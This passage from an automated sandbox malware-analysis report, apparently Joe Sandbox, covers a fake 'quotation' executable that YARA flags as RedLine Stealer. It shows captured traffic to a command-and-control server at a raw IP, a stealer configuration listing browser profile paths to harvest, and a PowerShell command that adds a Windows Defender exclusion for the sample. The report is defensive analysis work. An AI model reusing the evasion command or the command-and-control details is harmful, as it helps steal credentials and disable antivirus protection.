                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54971294.141.120.6551235652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 1, 2024 08:37:10.843554974 CET220OUTPOST / HTTP/1.1
                                                            Content-Type: text/xml; charset=utf-8
                                                            SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                            Host: 94.141.120.6:55123
                                                            Content-Length: 954986
                                                            Expect: 100-continue
                                                            Accept-Encoding: gzip, deflate
                                                            Nov 1, 2024 08:37:23.261192083 CET294INHTTP/1.1 200 OK
                                                            Content-Length: 147
                                                            Content-Type: text/xml; charset=utf-8
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 01 Nov 2024 15:37:22 GMT
                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54975494.141.120.6551235652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 1, 2024 08:37:23.269249916 CET240OUTPOST / HTTP/1.1
                                                            Content-Type: text/xml; charset=utf-8
                                                            SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                            Host: 94.141.120.6:55123
                                                            Content-Length: 954978
                                                            Expect: 100-continue
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: Keep-Alive
                                                            Nov 1, 2024 08:37:33.992919922 CET408INHTTP/1.1 200 OK
                                                            Content-Length: 261
                                                            Content-Type: text/xml; charset=utf-8
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 01 Nov 2024 15:37:33 GMT
                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:03:36:55
                                                            Start date:01/11/2024
                                                            Path:C:\Users\user\Desktop\QUOTATION#09678.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\QUOTATION#09678.exe"
                                                            Imagebase:0x2ccfea00000
                                                            File size:2'789'519 bytes
                                                            MD5 hash:4E5909728A72EB29F5CF1FE01867C982
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:03:36:55
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:03:36:57
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:03:36:57
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:03:36:57
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                            Imagebase:0xd80000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:03:36:57
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:03:36:57
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                            Imagebase:
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:03:36:58
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\WerFault.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 764 -s 1056
                                                            Imagebase:0x7ff6032e0000
                                                            File size:570'736 bytes
                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:03:37:02
                                                            Start date:01/11/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff6ef0c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:12.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:6
                                                              Total number of Limit Nodes:0
                                                              execution_graph 15468 7ff848e5381a 15469 7ff848e53829 VirtualProtect 15468->15469 15471 7ff848e5390b 15469->15471 15464 7ff848e50e65 15465 7ff848e50e89 FreeConsole 15464->15465 15467 7ff848e50f1e 15465->15467

                                                              Executed Functions

                                                              Function 00007FF848E550AC Relevance: 6.7, Strings: 5, Instructions: 464COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: fish$h3H$pTH$xIH$HH
                                                              • API String ID: 0-1523251078
                                                              • Opcode ID: 88d9e3475a971a42a7064a1b7d1c22d9909214f8db60a88059b9816e249b32ba
                                                              • Instruction ID: 05d6b099bd952042b8c468c212886907ef571f40ef07342ec4725b01818aa334
                                                              • Opcode Fuzzy Hash: 88d9e3475a971a42a7064a1b7d1c22d9909214f8db60a88059b9816e249b32ba
                                                              • Instruction Fuzzy Hash: F8D16771A1CA4A5FE75CFB7898651B9B7E1FF96350F04017EE48BC31D2DE28A8028785
                                                              Function 00007FF848E5F699 Relevance: 2.7, Strings: 1, Instructions: 1452COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 314 7ff848e5f699-7ff848e5f70e 319 7ff848e5f77f-7ff848e5f795 call 7ff848e5bbf0 314->319 320 7ff848e5f710-7ff848e5f715 314->320 333 7ff848e5f7af-7ff848e5f7ba 319->333 334 7ff848e5f797-7ff848e5f7aa 319->334 322 7ff848e5f717-7ff848e5f731 call 7ff848e58290 320->322 323 7ff848e5f796-7ff848e5f7aa 320->323 324 7ff848e5f848-7ff848e5f84a 323->324 328 7ff848e5f84c-7ff848e5f851 324->328 329 7ff848e5f8bb-7ff848e5f8c7 324->329 335 7ff848e5f853-7ff848e5f86f 328->335 336 7ff848e5f8d2 328->336 331 7ff848e5f8cd-7ff848e5f8d1 329->331 332 7ff848e5faa9-7ff848e5fb03 329->332 331->336 352 7ff848e5fb09-7ff848e5fb64 call 7ff848e5bbf0 * 2 call 7ff848e57ef0 332->352 353 7ff848e5fc36-7ff848e5fc93 332->353 337 7ff848e5f7bc-7ff848e5f7cf 333->337 338 7ff848e5f7d1-7ff848e5f7dc 333->338 334->324 339 7ff848e5f8d8-7ff848e5f926 call 7ff848e5bbf0 * 2 call 7ff848e57ef0 336->339 340 7ff848e5f8d4-7ff848e5f8d5 336->340 337->324 342 7ff848e5f7de-7ff848e5f7f0 338->342 343 7ff848e5f7f2-7ff848e5f811 338->343 339->332 368 7ff848e5f92c-7ff848e5f94a 339->368 340->339 342->324 343->324 351 7ff848e5f813-7ff848e5f844 343->351 351->324 352->353 383 7ff848e5fb6a-7ff848e5fbc0 352->383 362 7ff848e5fd4e-7ff848e5fd59 353->362 363 7ff848e5fc99-7ff848e5fcee call 7ff848e5bbf0 * 2 call 7ff848e57ef0 353->363 373 7ff848e5fd5e-7ff848e5fda7 362->373 374 7ff848e5fd5b-7ff848e5fd5d 362->374 363->362 402 7ff848e5fcf0-7ff848e5fd14 363->402 368->332 371 7ff848e5f950-7ff848e5f96a 368->371 377 7ff848e5f96c-7ff848e5f96f 371->377 378 7ff848e5f9c3-7ff848e5f9e8 371->378 394 7ff848e5fdad-7ff848e5fe06 call 7ff848e5bbf0 * 2 call 7ff848e57ef0 373->394 395 7ff848e5ff3b-7ff848e5ff6a 373->395 374->373 384 7ff848e5f971-7ff848e5f990 377->384 385 7ff848e5f9f0-7ff848e5f9fa 377->385 380 7ff848e5f9ea-7ff848e5f9ef 378->380 381 7ff848e5fa01-7ff848e5fa16 378->381 380->385 390 7ff848e5fa18-7ff848e5fa29 381->390 383->353 391 7ff848e5fbc2-7ff848e5fc0d call 7ff848e5c5c0 383->391 384->381 392 7ff848e5f992-7ff848e5f997 384->392 387 7ff848e5f9fc-7ff848e5f9ff 385->387 388 7ff848e5fa2e-7ff848e5fa7f call 7ff848e5c5c0 385->388 387->388 388->332 410 7ff848e5fa81-7ff848e5faa8 388->410 390->388 397 7ff848e5fa2b-7ff848e5fa2c 390->397 391->353 411 7ff848e5fc0f-7ff848e5fc35 391->411 392->390 393 7ff848e5f999-7ff848e5f9c2 call 7ff848e58290 392->393 393->378 394->395 426 7ff848e5fe0c-7ff848e5fe2a 394->426 416 7ff848e5ff6c-7ff848e5ff97 395->416 417 7ff848e5ffb4-7ff848e5fff3 call 7ff848e5bbf0 * 2 call 7ff848e57ef0 395->417 397->388 407 7ff848e5fd16-7ff848e5fd26 402->407 408 7ff848e5fd42-7ff848e5fd4d 402->408 407->362 413 7ff848e5fd28-7ff848e5fd3f 407->413 413->408 420 7ff848e5ff9d-7ff848e5ffb3 416->420 421 7ff848e600f7-7ff848e60129 416->421 417->421 441 7ff848e5fff9-7ff848e60014 417->441 420->417 437 7ff848e6012b-7ff848e60156 421->437 438 7ff848e60173-7ff848e6018b call 7ff848e5bbf0 421->438 426->395 429 7ff848e5fe30-7ff848e5fe4a 426->429 432 7ff848e5fe4c-7ff848e5fe6a 429->432 433 7ff848e5fea3-7ff848e5fea7 429->433 444 7ff848e5fe6c-7ff848e5fe81 432->444 445 7ff848e5fe83-7ff848e5fe94 432->445 434 7ff848e5fea9-7ff848e5ff0f call 7ff848e58290 call 7ff848e5c5c0 433->434 435 7ff848e5ff28-7ff848e5ff3a 433->435 456 7ff848e5ff11 434->456 442 7ff848e6015c-7ff848e6016f 437->442 443 7ff848e60225-7ff848e60237 437->443 438->443 449 7ff848e6006d-7ff848e60074 441->449 450 7ff848e60016-7ff848e60019 441->450 442->438 460 7ff848e60279-7ff848e60287 443->460 461 7ff848e60239-7ff848e6025a 443->461 447 7ff848e5fe98-7ff848e5fea0 444->447 445->447 447->456 457 7ff848e5fea2 447->457 449->421 458 7ff848e6007a-7ff848e60097 449->458 454 7ff848e6001b-7ff848e60039 450->454 455 7ff848e6009a-7ff848e600a9 450->455 462 7ff848e600aa-7ff848e600be call 7ff848e5c5c0 454->462 465 7ff848e6003b-7ff848e60040 454->465 455->462 456->395 464 7ff848e5ff13-7ff848e5ff26 456->464 457->433 458->455 468 7ff848e6028d-7ff848e602a1 460->468 469 7ff848e603e3-7ff848e603f9 460->469 472 7ff848e6025c-7ff848e60276 461->472 473 7ff848e602a4-7ff848e602df call 7ff848e5bbf0 * 2 call 7ff848e5d870 461->473 470 7ff848e600c1-7ff848e600cd 462->470 464->435 465->470 471 7ff848e60042-7ff848e60066 call 7ff848e58290 465->471 468->473 482 7ff848e603fb-7ff848e6040f 469->482 483 7ff848e603fa 469->483 470->421 475 7ff848e600cf-7ff848e600f6 470->475 471->449 472->460 496 7ff848e602f9-7ff848e60304 473->496 497 7ff848e602e1-7ff848e602f7 473->497 487 7ff848e60411-7ff848e60449 482->487 483->482 489 7ff848e6045f 487->489 490 7ff848e6044b-7ff848e6045d call 7ff848e501b8 487->490 492 7ff848e60464-7ff848e604f1 489->492 490->492 522 7ff848e605d8-7ff848e605df 492->522 523 7ff848e604f7-7ff848e6051b 492->523 502 7ff848e60316 496->502 503 7ff848e60306-7ff848e60314 496->503 497->496 504 7ff848e60318-7ff848e6031d 502->504 503->504 506 7ff848e6031f-7ff848e6033e call 7ff848e53058 504->506 507 7ff848e60340-7ff848e60356 504->507 512 7ff848e60383-7ff848e60389 506->512 514 7ff848e60358-7ff848e60364 507->514 515 7ff848e6036a-7ff848e6037f call 7ff848e5e260 507->515 512->483 516 7ff848e6038b-7ff848e60390 512->516 514->515 515->512 516->487 518 7ff848e60392-7ff848e603c0 call 7ff848e58290 call 7ff848e57ef0 516->518 518->469 534 7ff848e603c2-7ff848e603e2 518->534 525 7ff848e605fc-7ff848e6060c 522->525 526 7ff848e605e1-7ff848e605ee 522->526 531 7ff848e60612-7ff848e60623 525->531 526->525 533 7ff848e605f0-7ff848e605fa 526->533 533->525
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )H
                                                              • API String ID: 0-3927468839
                                                              • Opcode ID: 48c8e8a1be7e6936bf23801e0e3b5d7cf13604cf0d09efb0593952394920275d
                                                              • Instruction ID: 6bd256b05da9a7b7f44cfa2390b974aa9ef486cbedddf100da2e76bb3d5df674
                                                              • Opcode Fuzzy Hash: 48c8e8a1be7e6936bf23801e0e3b5d7cf13604cf0d09efb0593952394920275d
                                                              • Instruction Fuzzy Hash: 3DA2467061CB894FD359EB2884904B5B7E2FF95341F1449BEE48AC72A6DF38E846C781
                                                              Function 00007FF848E54F00 Relevance: 2.6, Instructions: 2578COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78e9e3fd1e6781d8b436045c816a81bbf78746bde55bda08275e82aeb11c2bbd
                                                              • Instruction ID: 05ea8c592aca45c9e2eadf9772692639cf8d7dff7e39123d3618fc92b1439e44
                                                              • Opcode Fuzzy Hash: 78e9e3fd1e6781d8b436045c816a81bbf78746bde55bda08275e82aeb11c2bbd
                                                              • Instruction Fuzzy Hash: 6EF2643190CA8A8FE759EB2884912B57BE1FF91350F5441BED48ADB193DF38B846C784
                                                              Function 00007FF848F20061 Relevance: 2.2, Instructions: 2202COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271442076.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848f20000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4a7d8ecc4db44e2c55cfcd8935f98a502f78d71da4083a16afd6b313bac4b58
                                                              • Instruction ID: 0ff80330761b5a13ed69db8583d1cdf6023f057fbaa36dc59f292612790a4398
                                                              • Opcode Fuzzy Hash: b4a7d8ecc4db44e2c55cfcd8935f98a502f78d71da4083a16afd6b313bac4b58
                                                              • Instruction Fuzzy Hash: 48E2377280DACA8FE756FB28A8555A47FE0FF96340F1801FEC489CB1D3DA25684AC745
                                                              Function 00007FF848E5BEC4 Relevance: 2.0, Strings: 1, Instructions: 755COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1501 7ff848e5bec4-7ff848e5befe call 7ff848e59f40 1505 7ff848e5bf6f 1501->1505 1506 7ff848e5bf00-7ff848e5bf05 1501->1506 1509 7ff848e5bf75-7ff848e5bf83 1505->1509 1510 7ff848e5bf71-7ff848e5bf72 1505->1510 1507 7ff848e5bf07-7ff848e5bf68 call 7ff848e58290 1506->1507 1508 7ff848e5bf86-7ff848e5bf8e 1506->1508 1514 7ff848e5bf8f-7ff848e5bfec 1507->1514 1515 7ff848e5bf6a-7ff848e5bf6e 1507->1515 1509->1508 1510->1509 1519 7ff848e5bfee-7ff848e5c019 1514->1519 1520 7ff848e5c036-7ff848e5c05f call 7ff848e5bbf0 call 7ff848e57ef0 1514->1520 1515->1505 1521 7ff848e5c15c-7ff848e5c169 1519->1521 1522 7ff848e5c01f-7ff848e5c032 1519->1522 1520->1521 1532 7ff848e5c065-7ff848e5c08f call 7ff848e58650 1520->1532 1527 7ff848e5c16b 1521->1527 1528 7ff848e5c171 1521->1528 1522->1520 1527->1528 1530 7ff848e5c175 1528->1530 1531 7ff848e5c173 1528->1531 1535 7ff848e5c176-7ff848e5c18a 1530->1535 1531->1530 1533 7ff848e5c1b5 1531->1533 1540 7ff848e5c09d-7ff848e5c0ad 1532->1540 1541 7ff848e5c091-7ff848e5c09b 1532->1541 1537 7ff848e5c1bb-7ff848e5c1d2 1533->1537 1538 7ff848e5c2b3-7ff848e5c2c3 1533->1538 1542 7ff848e5c18c-7ff848e5c1b3 1535->1542 1543 7ff848e5c1d4-7ff848e5c1e9 call 7ff848e57ef0 1535->1543 1537->1543 1550 7ff848e5c2c5-7ff848e5c2ec 1538->1550 1541->1540 1544 7ff848e5c0bc-7ff848e5c0c3 1541->1544 1542->1533 1543->1538 1553 7ff848e5c1ef-7ff848e5c255 call 7ff848e58650 * 4 1543->1553 1551 7ff848e5c12a-7ff848e5c132 1544->1551 1552 7ff848e5c0c5-7ff848e5c0cc 1544->1552 1564 7ff848e5c2ee-7ff848e5c2f1 1550->1564 1565 7ff848e5c336-7ff848e5c373 call 7ff848e5bbf0 * 2 call 7ff848e57ef0 1550->1565 1551->1521 1555 7ff848e5c134-7ff848e5c146 1551->1555 1556 7ff848e5c0ce-7ff848e5c0d1 1552->1556 1557 7ff848e5c125 1552->1557 1594 7ff848e5c25b-7ff848e5c25c 1553->1594 1595 7ff848e5c257-7ff848e5c259 1553->1595 1567 7ff848e5c14c-7ff848e5c151 1555->1567 1561 7ff848e5c0d3-7ff848e5c0d6 1556->1561 1562 7ff848e5c152-7ff848e5c15b 1556->1562 1557->1535 1560 7ff848e5c127-7ff848e5c128 1557->1560 1560->1567 1568 7ff848e5c0d8-7ff848e5c0de 1561->1568 1569 7ff848e5c0e0-7ff848e5c0e3 1561->1569 1566 7ff848e5c2f2 1564->1566 1588 7ff848e5c543-7ff848e5c5a5 call 7ff848e5bfc0 1565->1588 1597 7ff848e5c379-7ff848e5c394 1565->1597 1572 7ff848e5c318-7ff848e5c319 1566->1572 1573 7ff848e5c2f4-7ff848e5c2f5 1566->1573 1567->1562 1568->1569 1574 7ff848e5c0fc-7ff848e5c10e 1569->1574 1575 7ff848e5c0e5-7ff848e5c0fa 1569->1575 1587 7ff848e5c31f-7ff848e5c335 1572->1587 1572->1588 1578 7ff848e5c2fa-7ff848e5c30c 1573->1578 1574->1521 1582 7ff848e5c110-7ff848e5c122 1574->1582 1575->1574 1583 7ff848e5c311-7ff848e5c317 1578->1583 1582->1557 1583->1572 1587->1565 1600 7ff848e5c265-7ff848e5c26c 1594->1600 1595->1600 1598 7ff848e5c3ed-7ff848e5c3f6 1597->1598 1599 7ff848e5c396-7ff848e5c399 1597->1599 1606 7ff848e5c469-7ff848e5c471 1598->1606 1603 7ff848e5c39b-7ff848e5c3ac 1599->1603 1604 7ff848e5c41a-7ff848e5c425 1599->1604 1600->1550 1605 7ff848e5c26e-7ff848e5c271 1600->1605 1612 7ff848e5c427-7ff848e5c447 1603->1612 1614 7ff848e5c3ae-7ff848e5c3bb 1603->1614 1604->1612 1605->1566 1611 7ff848e5c273-7ff848e5c289 1605->1611 1609 7ff848e5c473-7ff848e5c478 1606->1609 1610 7ff848e5c4e2-7ff848e5c4f7 1606->1610 1615 7ff848e5c4f9-7ff848e5c502 call 7ff848e54d00 1609->1615 1616 7ff848e5c47a-7ff848e5c4be call 7ff848e58290 1609->1616 1610->1615 1611->1578 1617 7ff848e5c28b-7ff848e5c290 1611->1617 1625 7ff848e5c449-7ff848e5c452 1612->1625 1620 7ff848e5c3bd-7ff848e5c3cd 1614->1620 1621 7ff848e5c3f8-7ff848e5c417 1614->1621 1630 7ff848e5c507-7ff848e5c517 1615->1630 1616->1588 1632 7ff848e5c4c4-7ff848e5c4e1 